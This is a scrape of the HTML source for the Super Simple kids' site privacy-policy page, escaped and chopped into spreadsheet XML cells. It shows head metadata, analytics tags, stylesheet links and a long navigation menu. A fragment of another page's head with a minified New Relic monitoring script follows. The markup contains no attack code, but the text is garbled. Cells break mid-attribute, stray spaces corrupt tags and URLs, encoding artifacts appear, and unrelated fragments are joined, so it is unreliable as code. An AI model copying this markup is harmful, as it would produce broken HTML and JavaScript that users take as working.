&lt;!-- Global site tag (gtag.js) - Google Analytics --&gt;
&lt;script async src="https://www.googletagmanager.com/gtag/js?id=G-F947RBSKEB"&gt;&lt;/script&gt;
&lt;script&gt;
window.dataLayer = window.dataLayer ||</t>
  </si>
  <si>
    <t>[];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'G-F947RBSKEB');
&lt;/script&gt;
&lt;meta charset="utf-8"&gt;
&lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;
&lt;title&gt;Privacy Policy for Skyship Entertainment Company - Super Simple&lt;/title&gt;
&lt;meta name="HandheldFriendly" content="True"&gt;
&lt;meta name="MobileOptimized" content="320"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0"/&gt;
&lt;link rel="apple-touch-icon" href="https://supersimple.com/wp-content/themes/mike-default/library/images/apple-touch-icon.png"&gt;
&lt;link rel="icon" href="https://supersimple.com/wp-content/themes/mike-default/favicon.png"&gt;
&lt;!--[if IE]&gt;
&lt;link rel="shortcut icon" href="https://supersimple.com/wp-content/themes/mike-default/favicon.ico"&gt;
&lt;! [endif]--&gt;
&lt;link rel="pingback" href="https://supersimple.com/xmlrpc.php"&gt;
&lt;!--</t>
  </si>
  <si>
    <t>&lt;link rel="stylesheet" type="text/css" href="https://supersimple.com/wp-content/themes/mike-default/library/owl-carousel/assets/owl.carousel.css"/&gt; --&gt;
&lt;!-- &lt;link rel="stylesheet" type="text/css" href="https://supersimple.com/wp-content/themes/mike-default/library/lity/lity.min.css"&gt; --&gt;
&lt;link rel="stylesheet" type="text/css" href="//supersimple.com/wp-content/cache/wpfc-minified/98i79jmz/9t86t.css" media="all"/&gt;
&lt;!-- &lt;link href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css?family=Bubblegum+Sans" rel="stylesheet"&gt; --&gt;
&lt;link href="https://fonts.googleapis.com/ css?family=Asap+Condensed:600|BenchNine|Nunito+Sans:300,600|Oswald&amp;display=swap" rel="stylesheet"&gt;
&lt;link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.2.0/css/all.css" integrity="sha384-hWVjflwFxL6sNzntih27bfxkr27PmbbK/iSvJ+a4+0owXq79v+lsFkW54bOGbiDQ" crossorigin="anonymous"&gt;
&lt;meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /&gt;
&lt;!-- This site is optimized with the Yoast SEO plugin v20.4 - https://yoast.com/wordpress/plugins/seo/ --&gt;
&lt;link rel="canonical" href="https://supersimple.com/privacy-policy/" /&gt;
&lt;meta property="og:locale" content="en_US" /&gt;
&lt;meta property="og:type" content="article" /&gt;
&lt;meta property="og:title" content="Privacy Policy for Skyship Entertainment Company - Super Simple" /&gt;
&lt;meta property="og:description" content="Effective Date: January 25, 2022</t>
  </si>
  <si>
    <t>This Privacy Policy is about how Skyship Entertainment Company collects and uses information from people who use our Services (a “user” or &amp;#8220;users&amp;#8221;). The word “Services” in this Privacy Policy means our websites (including those located at supersimple.com and skyship.tv) and our other digital products and services (including the Super... Read more &amp;raquo;" /&gt;
&lt;meta property="og:url" content="https://supersimple.com/privacy-policy/" /&gt;
&lt;meta property="og:site_name" content="Super Simple" /&gt;
&lt;meta property="article:modified_time" content="2022-04-26T00:57:42+00:00" /&gt;
&lt;meta name="twitter:card" content="summary_large_image" /&gt;
&lt;meta name="twitter:label1" content="Est. reading time" /&gt;
&lt;meta name="twitter:data1" content="11 minutes" /&gt;
&lt;script type="application/ld+json" class="yoast-schema-graph"&gt;{"@context":"https://schema.org","@graph":[{"@type":"WebPage","@id":"https://supersimple.com/privacy-policy/","url":"https://supersimple.com/privacy-policy/","name":"Privacy Policy for Skyship Entertainment Company - Super Simple","isPartOf":{"@id":"https://supersimple.com/#website"},"datePublished":"2018-01-29T18:50:21+00:00","dateModified":"2022-04-26T00:57:42+00:00","breadcrumb":{"@id":"https://supersimple.com/privacy-policy/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://supersimple.com/privacy-policy/"]}]},{"@type":"BreadcrumbList","@id":"https://supersimple.com/privacy-policy/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://supersimple.com/"},{"@type":"ListItem","position":2,"name":"Privacy Policy for Skyship Entertainment Company"}]},{"@type":"WebSite","@id":"https://supersimple.com/#website","url":"https://supersimple.com/","name":"Super Simple","description":"Kids songs, shows, and free teaching resources!","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://supersimple.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"}]}&lt;/script&gt;
&lt;!-- / Yoast SEO plugin.</t>
  </si>
  <si>
    <t>--&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Super Simple &amp;raquo; Feed" href="https://supersimple.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Super Simple &amp;raquo; Comments Feed" href="https://supersimple.com/comments/feed/" /&gt;
&lt;!-- &lt;link rel='stylesheet' id='wp-block-library-css' href='https://supersimple.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /&gt; --&gt;
&lt;!-- &lt;link rel='stylesheet' id='wc-blocks-vendors-style-css' href='https://supersimple.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendors-style.css' type='text/css' media='all' /&gt; --&gt;
&lt;!--</t>
  </si>
  <si>
    <t>&lt;link rel='stylesheet' id='wc-blocks-style-css' href='https://supersimple.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style.css' type='text/css' media='all' /&gt; --&gt;
&lt;!-- &lt;link rel='stylesheet' id='wc-memberships-blocks-css' href='https://supersimple.com/wp-content/plugins/woocommerce-memberships/assets/css/blocks/wc-memberships-blocks.min.css' type='text/css' media='all' /&gt; --&gt;
&lt;!-- &lt;link rel='stylesheet' id='classic-theme-styles-css' href='https://supersimple.com/wp-includes/css/classic-themes.min.css' type='text/css' media='all' /&gt; --&gt;
&lt;link rel="stylesheet" type="text/css" href="//supersimple.com/wp-content/cache/wpfc-minified/2ccxrefq/e4r5n.css" media="all"/&gt;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t>
  </si>
  <si>
    <t>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 2em;}body .is-layout-flow &gt; .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-flow &gt; .aligncenter{margin-left: auto !important;margin-right: auto !</t>
  </si>
  <si>
    <t>important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) ! important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
&lt;/style&gt;
&lt;!-- &lt;link rel='stylesheet' id='wc-aelia-cs-frontend-css' href='https://supersimple.com/wp-content/plugins/woocommerce-aelia-currencyswitcher/src/design/css/frontend.css' type='text/css' media='all' /&gt; --&gt;
&lt;!--</t>
  </si>
  <si>
    <t>&lt;link rel='stylesheet' id='follow-up-emails-css' href='https://supersimple.com/wp-content/plugins/woocommerce-follow-up-emails/templates/followups.css' type='text/css' media='all' /&gt; --&gt;
&lt;!-- &lt;link rel='stylesheet' id='woocommerce-layout-css' href='https://supersimple.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css' type='text/css' media='all' /&gt; --&gt;
&lt;link rel="stylesheet" type="text/css" href="//supersimple.com/wp-content/cache/wpfc-minified/7wmymnk9/9t86t.css" media="all"/&gt;
&lt;!-- &lt;link rel='stylesheet' id='woocommerce-smallscreen-css' href='https://supersimple.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css' type='text/css' media='only screen and (max-width: 768px)' /&gt; --&gt;
&lt;link rel="stylesheet" type="text/css" href="//supersimple.com/wp-content/cache/wpfc-minified/6n0h6lw6/9t86t.css" media="only screen and (max-width:</t>
  </si>
  <si>
    <t>768px)"/&gt;
&lt;!-- &lt;link rel='stylesheet' id='woocommerce-general-css' href='https://supersimple.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css' type='text/css' media='all' /&gt; --&gt;
&lt;link rel="stylesheet" type="text/css" href="//supersimple.com/wp-content/cache/wpfc-minified/2mo976to/9t86t.css" media="all"/&gt;
&lt;style id='woocommerce-inline-inline-css' type='text/css'&gt;
.woocommerce form .form-row .required { visibility: visible; }
&lt;/style&gt;
&lt;!-- &lt;link rel='stylesheet' id='wc-memberships-frontend-css' href='https://supersimple.com/wp-content/plugins/woocommerce-memberships/assets/css/frontend/wc-memberships-frontend.min.css' type='text/css' media='all' /&gt; --&gt;
&lt;!--</t>
  </si>
  <si>
    <t>&lt;link rel='stylesheet' id='bones-stylesheet-css' href='https://supersimple.com/wp-content/themes/mike-default/library/css/style.css' type='text/css' media='all' /&gt; --&gt;
&lt;link rel="stylesheet" type="text/css" href="//supersimple.com/wp-content/cache/wpfc-minified/jzw37861/9t86t.css" media="all"/&gt;
&lt;!--[if lt IE 9]&gt;
&lt;link rel='stylesheet' id='bones-ie-only-css' href='https://supersimple.com/wp-content/themes/mike-default/library/css/ie.css' type='text/css' media='all' /&gt;
&lt;! [endif]--&gt;
&lt;link rel='stylesheet' id='my_custom_css-css' href='https://supersimple.com/wp-content/themes/mike-default/library/css/woocommerce-customizations.css' type='text/css' media='all' /&gt;
&lt;script src='//supersimple.com/wp-content/cache/wpfc-minified/2msff3wh/9t86t.js' type="text/javascript"&gt;&lt;/script&gt;
&lt;!--</t>
  </si>
  <si>
    <t>&lt;script type='text/javascript' src='https://supersimple.com/wp-includes/js/jquery/jquery.min.js' id='jquery-core-js'&gt;&lt;/script&gt; --&gt;
&lt;!-- &lt;script type='text/javascript' src='https://supersimple.com/wp-includes/js/jquery/jquery-migrate.min.js' id='jquery-migrate-js'&gt;&lt;/script&gt; --&gt;
&lt;script type='text/javascript' id='fue-account-subscriptions-js-extra'&gt;
/* &lt;! [CDATA[ */
var FUE = {"ajaxurl":"https:\/\/supersimple.com\/wp-admin\/admin-ajax.php","ajax_loader":"https:\/\/supersimple.com\/wp-content\/plugins\/woocommerce-follow-up-emails\/templates\/images\/ajax-loader.gif"};
/* ]]&gt; */
&lt;/script&gt;
&lt;script src='//supersimple.com/wp-content/cache/wpfc-minified/lkxipyxp/9t86t.js' type="text/javascript"&gt;&lt;/script&gt;
&lt;!-- &lt;script type='text/javascript' src='https://supersimple.com/wp-content/plugins/woocommerce-follow-up-emails/templates/js/fue-account-subscriptions.js' id='fue-account-subscriptions-js'&gt;&lt;/script&gt; --&gt;
&lt;script type='text/javascript' id='my_loadmore-js-extra'&gt;
/* &lt;!</t>
  </si>
  <si>
    <t>[CDATA[ */
var misha_loadmore_params = {"ajaxurl":"https:\/\/supersimple.com\/wp-admin\/admin-ajax.php","posts":"{\"page\":0,\"pagename\":\"privacy-policy\",\"error\":\"\",\"m\":\"\",\"p\":0,\"post_parent\":\"\",\"subpost\":\"\",\"subpost_id\":\"\",\"attachment\":\"\",\"attachment_id\":0,\"name\":\"privacy-policy\",\"page_id\":0,\"second\":\"\",\"minute\":\"\",\"hour\":\"\",\"day\":0,\"monthnum\":0,\"year\":0,\"w\":0,\"category_name\":\"\",\"tag\":\"\",\"cat\":\"\",\"tag_id\":\"\",\"author\":\"\",\"author_name\":\"\",\"feed\":\"\",\"tb\":\"\",\"paged\":0,\"meta_key\":\"\",\"meta_value\":\"\",\"preview\":\"\",\"s\":\"\",\"sentence\":\"\",\"title\":\"\",\"fields\":\"\",\"menu_order\":\"\",\"embed\":\"\",\"category__in\":[],\"category__not_in\":[],\"category__and\":[],\"post__in\":[],\"post__not_in\":[],\"post_name__in\":[],\"tag__in\":[],\"tag__not_in\":[],\"tag__and\":[],\"tag_slug__in\":[],\"tag_slug__and\":[],\"post_parent__in\":[],\"post_parent__not_in\":[],\"author__in\":[],\"author__not_in\":[],\"ignore_sticky_posts\":false,\"suppress_filters\":false,\"cache_results\":true,\"update_post_term_cache\":true,\"update_menu_item_cache\":false,\"lazy_load_term_meta\":true,\"update_post_meta_cache\":true,\"post_type\":\"\",\"posts_per_page\":10,\"nopaging\":false,\"comments_per_page\":\"50\",\"no_found_rows\":false,\"order\":\"DESC\"}","current_page":"1","max_page":"1"};
/* ]]&gt; */
&lt;/script&gt;
&lt;script src='//supersimple.com/wp-content/cache/wpfc-minified/eh1002g2/9t86t.js' type="text/javascript"&gt;&lt;/script&gt;
&lt;!-- &lt;script type='text/javascript' src='https://supersimple.com/wp-content/themes/mike-default/library/js/myloadmore.js' id='my_loadmore-js'&gt;&lt;/script&gt; --&gt;
&lt;!-- &lt;script type='text/javascript' src='https://supersimple.com/wp-content/themes/mike-default/library/js/libs/modernizr.custom.min.js' id='bones-modernizr-js'&gt;&lt;/script&gt; --&gt;
&lt;link rel="https://api.w.org/" href="https://supersimple.com/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://supersimple.com/wp-json/wp/v2/pages/7942" /&gt;&lt;link rel='shortlink' href='https://supersimple.com/?p=7942' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://supersimple.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsupersimple.com%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://supersimple.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsupersimple.com%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
&lt;style&gt;
#wpadminbar {
background: #2271b1;
}
&lt;/style&gt;
&lt;noscript&gt;&lt;style&gt;.woocommerce-product-gallery{ opacity:</t>
  </si>
  <si>
    <t>1 !important; }&lt;/style&gt;&lt;/noscript&gt;
&lt;!-- &lt;script type="text/javascript" src="https://supersimple.com/wp-content/themes/mike-default/library/owl-carousel/owl.carousel.min.js"&gt;&lt;/script&gt; --&gt;
&lt;!-- &lt;script type="text/javascript" src="https://supersimple.com/wp-content/themes/mike-default/library/lity/lity.min.js"&gt;&lt;/script&gt; --&gt;
&lt;!-- &lt;script type="text/javascript" src="https://supersimple.com/wp-content/themes/mike-default/library/js/jquery.sticky-kit.min.js"&gt;&lt;/script&gt; --&gt;
&lt;meta property="og:image" content="https://supersimpleonline.com/wp-content/uploads/sso-logo-shadow.png"/&gt;
&lt;meta property="fb:app_id" content="136744340266048" /&gt;
&lt;meta name="apple-itunes-app" content="app-id=1458640095"&gt;
&lt;/head&gt;
&lt;body class="privacy-policy page-template page-template-page-contests page-template-page-contests-php page page-id-7942 theme-mike-default woocommerce-no-js"&gt;
&lt;!--</t>
  </si>
  <si>
    <t>Google Tag Manager (noscript) --&gt;
&lt;noscript&gt;&lt;iframe src="https://www.googletagmanager.com/ns.html?id=GTM-55SZ2LN"
height="0" width="0" style="display:none;visibility:hidden"&gt;&lt;/iframe&gt;&lt;/noscript&gt;
&lt;!-- End Google Tag Manager (noscript) --&gt;
&lt;div id="container"&gt;
&lt;header id="header"&gt;
&lt;div class="headerDivider"&gt;&lt;/div&gt;
&lt;div id="inner-header" class="group"&gt;
&lt;p id="logo" class="h1"&gt;
&lt;a href="https://supersimple.com" rel="nofollow"&gt;
&lt;img src="https://supersimple.com/wp-content/uploads/logo-home.png" width="300" class="logoimg" alt="Super Simple"&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;div class="nav-icon"&gt;&lt;div class="c-hamburger c-hamburger--htx"&gt;&lt;span&gt;MENU&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;
&lt;nav class="mainNav"&gt;
&lt;ul id="menu-top-tabs" class="nav top-nav group" role="menubar"&gt;&lt;li id="menu-item-9882" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9882"&gt;&lt;a href="https://supersimple.com/super-simple-songs/"&gt;Songs&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-1086" class="left-icon-list menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1086" aria-haspopup="true" aria-expanded="false" tabindex="0"&gt;&lt;a href="#" role="button"&gt;Shows&lt;/a&gt;
&lt;ul class="sub-menu"&gt;
&lt;li id="menu-item-6598" class="has-icon icon-bumble menu-item menu-item-type-post_type menu-item-object-page menu-item-6598"&gt;&lt;a href="https://supersimple.com/the-bumble-nums/"&gt;The Bumble Nums&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-8185" class="has-icon icon-caitie menu-item menu-item-type-post_type menu-item-object-page menu-item-8185"&gt;&lt;a href="https://supersimple.com/caities-classroom/"&gt;Caitie’s Classroom&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-7828" class="has-icon icon-captain menu-item menu-item-type-post_type menu-item-object-page menu-item-7828"&gt;&lt;a href="https://supersimple.com/captain-monsterica-and-the-purple-protector/"&gt;Captain Monsterica&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-12192" class="has-icon icon-pirates menu-item menu-item-type-post_type menu-item-object-page menu-item-12192"&gt;&lt;a href="https://supersimple.com/captain-seasalt-and-the-abc-pirates/"&gt;Captain Seasalt &amp;#038; The ABC Pirates&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-1087" class="has-icon icon-carl menu-item menu-item-type-post_type menu-item-object-page menu-item-1087"&gt;&lt;a href="https://supersimple.com/carls-car-wash/"&gt;Carl’s Car Wash&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-1092" class="has-icon icon-finley menu-item menu-item-type-post_type menu-item-object-page menu-item-1092"&gt;&lt;a href="https://supersimple.com/finleys-factory/"&gt;Finley’s Factory&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-14687" class="has-icon icon-finny menu-item menu-item-type-post_type menu-item-object-page menu-item-14687"&gt;&lt;a href="https://supersimple.com/finny-the-shark/"&gt;Finny The Shark&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-17239" class="has-icon icon-howtoteach menu-item menu-item-type-post_type menu-item-object-page menu-item-17239"&gt;&lt;a href="https://supersimple.com/how-to-teach-super-simple-songs/"&gt;How</t>
  </si>
  <si>
    <t>To Teach Super Simple Songs&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-1088" class="has-icon icon-milo menu-item menu-item-type-post_type menu-item-object-page menu-item-1088"&gt;&lt;a href="https://supersimple.com/milos-monster-school-vlog/"&gt;Milo’s Monster School Vlog&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-6597" class="has-icon icon-monkey menu-item menu-item-type-post_type menu-item-object-page menu-item-6597"&gt;&lt;a href="https://supersimple.com/mr-monkey-monkey-mechanic/"&gt;Mr. Monkey, Monkey Mechanic&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-1095" class="has-icon icon-phonicsfun menu-item menu-item-type-post_type menu-item-object-page menu-item-1095"&gt;&lt;a href="https://supersimple.com/phonics-fun/"&gt;Phonics Fun&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-8659" class="has-icon icon-pratfall menu-item menu-item-type-post_type menu-item-object-page menu-item-8659"&gt;&lt;a href="https://supersimple.com/pratfall/"&gt;Pratfall&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-7480" class="has-icon icon-ballpit menu-item menu-item-type-post_type menu-item-object-page menu-item-7480"&gt;&lt;a href="https://supersimple.com/super-duper-ball-pit/"&gt;Super Duper Ball Pit&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-1093" class="has-icon icon-ssd menu-item menu-item-type-post_type menu-item-object-page menu-item-1093"&gt;&lt;a href="https://supersimple.com/super-simple-draw/"&gt;Super Simple Draw&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-60578" class="has-icon icon-podcast menu-item menu-item-type-post_type menu-item-object-page menu-item-60578"&gt;&lt;a href="https://supersimple.com/super-simple-podcast/"&gt;Super Simple Podcast&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-1090" class="has-icon icon-ppp menu-item menu-item-type-post_type menu-item-object-page menu-item-1090"&gt;&lt;a href="https://supersimple.com/super-simple-storytime/"&gt;Super Simple Storytime&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-1089" class="has-icon icon-tobee menu-item menu-item-type-post_type menu-item-object-page menu-item-1089"&gt;&lt;a href="https://supersimple.com/sing-along-with-tobee/"&gt;Tobee&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-1094" class="has-icon icon-treetop menu-item menu-item-type-post_type menu-item-object-page menu-item-1094"&gt;&lt;a href="https://supersimple.com/treetop-family/"&gt;Treetop Family&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-1096" class="has-icon icon-turnandlearn menu-item menu-item-type-post_type menu-item-object-page menu-item-1096"&gt;&lt;a href="https://supersimple.com/turn-and-learn/"&gt;Turn &amp;#038; Learn&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li id="menu-item-9883" class="left-icon-list menu-item menu-item-type-taxonomy menu-item-object-resource_topic menu-item-has-children menu-item-9883" aria-haspopup="true" aria-expanded="false" tabindex="0"&gt;&lt;a href="https://supersimple.com/content-topic/all-topics/"&gt;Themes&lt;/a&gt;
&lt;ul class="sub-menu"&gt;
&lt;li id="menu-item-9912" class="has-icon icon-action-verbs menu-item menu-item-type-taxonomy menu-item-object-resource_topic menu-item-9912"&gt;&lt;a href="https://supersimple.com/content-topic/action-verbs/"&gt;Action Verbs&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-9910" class="has-icon icon-alphabet menu-item menu-item-type-taxonomy menu-item-object-resource_topic menu-item-9910"&gt;&lt;a href="https://supersimple.com/content-topic/alphabet-spelling/"&gt;Alphabet / Spelling&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-9909" class="has-icon icon-animals menu-item menu-item-type-taxonomy menu-item-object-resource_topic menu-item-9909"&gt;&lt;a href="https://supersimple.com/content-topic/animals/"&gt;Animals (All)&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-10876" class="has-icon icon-animals-farm menu-item menu-item-type-taxonomy menu-item-object-resource_topic menu-item-10876"&gt;&lt;a href="https://supersimple.com/content-topic/animals-farm-animals/"&gt;Animals &amp;#8211; Farm Animals&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-10877" class="has-icon icon-animals-jungle menu-item menu-item-type-taxonomy menu-item-object-resource_topic menu-item-10877"&gt;&lt;a href="https://supersimple.com/content-topic/animals-jungle-animals/"&gt;Animals &amp;#8211; Jungle Animals&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-10878" class="has-icon icon-animals-pets menu-item menu-item-type-taxonomy menu-item-object-resource_topic menu-item-10878"&gt;&lt;a href="https://supersimple.com/content-topic/animals-pets/"&gt;Animals &amp;#8211; Pets&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-10879" class="has-icon icon-animals-sea menu-item menu-item-type-taxonomy menu-item-object-resource_topic menu-item-10879"&gt;&lt;a href="https://supersimple.com/content-topic/animals-sea-creatures/"&gt;Animals &amp;#8211; Sea Creatures&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-10004" class="has-icon icon-insects menu-item menu-item-type-taxonomy menu-item-object-resource_topic menu-item-10004"&gt;&lt;a href="https://supersimple.com/content-topic/insects/"&gt;Bugs&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-9997" class="has-icon icon-calendar menu-item menu-item-type-taxonomy menu-item-object-resource_topic menu-item-9997"&gt;&lt;a href="https://supersimple.com/content-topic/calendar-time/"&gt;Calendar &amp;amp; Time&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-15072" class="has-icon icon-clean-up menu-item menu-item-type-taxonomy menu-item-object-resource_topic menu-item-15072"&gt;&lt;a href="https://supersimple.com/content-topic/clean-up/"&gt;Clean Up&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-9998" class="has-icon icon-clothing menu-item menu-item-type-taxonomy menu-item-object-resource_topic menu-item-9998"&gt;&lt;a href="https://supersimple.com/content-topic/clothing/"&gt;Clothing&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-9999" class="has-icon icon-colors menu-item menu-item-type-taxonomy menu-item-object-resource_topic menu-item-9999"&gt;&lt;a href="https://supersimple.com/content-topic/colors/"&gt;Colors&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-9911" class="has-icon icon-counting menu-item menu-item-type-taxonomy menu-item-object-resource_topic menu-item-9911"&gt;&lt;a href="https://supersimple.com/content-topic/counting/"&gt;Counting&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-10000" class="has-icon icon-daily menu-item menu-item-type-taxonomy menu-item-object-resource_topic menu-item-10000"&gt;&lt;a href="https://supersimple.com/content-topic/daily-routines/"&gt;Daily Routines&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-15073" class="has-icon icon-dance-party menu-item menu-item-type-taxonomy menu-item-object-resource_topic menu-item-15073"&gt;&lt;a href="https://supersimple.com/content-topic/dance-party/"&gt;Dance Party!&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-15074" class="has-icon icon-dinosaurs menu-item menu-item-type-taxonomy menu-item-object-resource_topic menu-item-15074"&gt;&lt;a href="https://supersimple.com/content-topic/dinosaurs/"&gt;Dinosaurs&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-9915" class="has-icon icon-emotions menu-item menu-item-type-taxonomy menu-item-object-resource_topic menu-item-9915"&gt;&lt;a href="https://supersimple.com/content-topic/emotions/"&gt;Emotions&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-10001" class="has-icon icon-family menu-item menu-item-type-taxonomy menu-item-object-resource_topic menu-item-10001"&gt;&lt;a href="https://supersimple.com/content-topic/family/"&gt;Family&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-9913" class="has-icon icon-food menu-item menu-item-type-taxonomy menu-item-object-resource_topic menu-item-9913"&gt;&lt;a href="https://supersimple.com/content-topic/food/"&gt;Food&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-17512" class="has-icon icon-games menu-item menu-item-type-taxonomy menu-item-object-resource_topic menu-item-17512"&gt;&lt;a href="https://supersimple.com/content-topic/games/"&gt;Games&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-10002"</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;_x005F_x000D_
&lt;!--[if lt IE 7 ]&gt;&lt;html class="ie6" lang="en" dir="ltr"&gt; &lt;! [endif]--&gt;_x005F_x000D_
&lt;!--[if</t>
  </si>
  <si>
    <t>IE 7 ]&gt;&lt;html class="ie ie7" lang="en" dir="ltr"&gt; &lt;! [endif]--&gt;_x005F_x000D_
&lt;!--[if IE 8 ]&gt;&lt;html class="ie ie8" lang="en" dir="ltr"&gt; &lt;!</t>
  </si>
  <si>
    <t>[endif]--&gt;_x005F_x000D_
&lt;!--[if (gte IE 9)|!(IE)]&gt;&lt;!--&gt;&lt;html lang="en" dir="ltr"&gt;&lt;!--&lt;![endif]--&gt;_x005F_x000D_
	&lt;head&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8" /&gt;&lt;script type="text/javascript"&gt;(window. NREUM||(NREUM={})).init={ajax:{deny_list:["bam.nr-data.net"]}};(window.NREUM||(NREUM={})).loader_config={licenseKey:"NRJS-87c5cb91d9e5b79572a",applicationID:"472023307"};;(()=&gt;{var e,t,r={8768:(e,t,r)=&gt;{"use strict";r.d(t,{T:()=&gt;n,p:()=&gt;i});const n=/(iPad|iPhone|iPod)/g.test(navigator.userAgent),i=n&amp;&amp;Boolean("undefined"==typeof SharedWorker)},6562:(e,t,r)=&gt;{"use strict";r.d(t,{P_:()=&gt;v,Mt:()=&gt;p,C5:()=&gt;d,DL:()=&gt;w,OP:()=&gt;R,lF:()=&gt;z,Yu:()=&gt;A,Dg:()=&gt;h,CX:()=&gt;f,GE:()=&gt;y,sU:()=&gt;M});var n={};r.r(n),r.d(n,{agent:()=&gt;x,match:()=&gt;k,version:()=&gt;j});var i=r(6797),o=r(909),a=r(8610);class s{constructor(e,t){try{if(!e||"object"!=typeof e)return(0,a.</t>
  </si>
  <si>
    <t xml:space="preserve">Z)("New setting a Configurable requires an object as input");if(!t||"object"!=typeof t)return(0,a. Z)("Setting a Configurable requires a model to set its initial properties");Object.assign(this,t),Object.entries(e).forEach((e=&gt;{let[t,r]=e;const n=(0,o.q)(t);n.length&amp;&amp;r&amp;&amp;"object"==typeof r&amp;&amp;n.forEach((e=&gt;{e in r&amp;&amp;((0,a. Z)('"'.concat(e,'" is a protected attribute and can not be changed in feature ').concat(t,".  </t>
  </si>
  <si>
    <t>It will have no effect. ")),delete r[e])})),this[t]=r}))}catch(e){(0,a. Z)("An error occured while setting a Configurable",e)}}}const c={beacon:i.ce.beacon,errorBeacon:i.ce.errorBeacon,licenseKey:void 0,applicationID:void 0,sa:void 0,queueTime:void 0,applicationTime:void 0,ttGuid:void 0,user:void 0,account:void 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},u={};function d(e){if(!e)throw new Error("All info objects require an agent identifier!");if(!u[e])throw new Error("Info for ".concat(e," was never set"));return u[e]}function f(e,t){if(!e)throw new Error("All info objects require an agent identifier!");u[e]=new s(t,c),(0,i.Qy)(e,u[e],"info")}const l={allow_bfcache:!0,privacy:{cookies_enabled:!0},ajax:{deny_list:void 0,enabled:!0,harvestTimeSeconds:10},distributed_tracing:{enabled:void 0,exclude_newrelic_header:void 0,cors_use_newrelic_header:void 0,cors_use_tracecontext_headers:void 0,allowed_origins:void 0},ssl:void 0,obfuscate:void 